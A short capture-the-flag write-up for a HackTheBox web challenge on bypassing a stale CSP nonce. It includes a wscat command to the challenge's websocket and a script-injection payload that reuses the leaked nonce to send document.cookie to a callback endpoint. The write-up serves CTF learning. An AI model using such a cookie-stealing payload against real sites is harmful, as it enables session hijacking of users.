HackTheBox Cursed Stale Policy Challenge

2024-11-30[Updated: 2024-11-30]

https://app.hackthebox.com/challenges/811

Description

This policy is cursed, can you bypass it?

Exploitation

Looking at the code, the most developed aspect seems to be the logging in the websocket, so here’s the approach to interact with it:

wscat -c http://94.237.59.180:49425/ws

The nonce is shown in the default policy, and this is the already provided payload with the nonce:

<script nonce="5247551b650fb492cdb1cad3fe71d337">
   fetch('/callback', {
       method: 'POST',
       headers: { 'Content-Type': 'application/json' },
       body: JSON.stringify({ cookies: document.cookie })
   });
</script>

Trigger the Bot, and the result will be displayed either in the WebSocket logs or in the Request History.

Note: Previously, the Request History feature was not implemented, which is why using the websocket was necessary to capture the information.

Summary

Cursed Stale Policy: abuse websocket to cross the web trust boundary and recover the flag.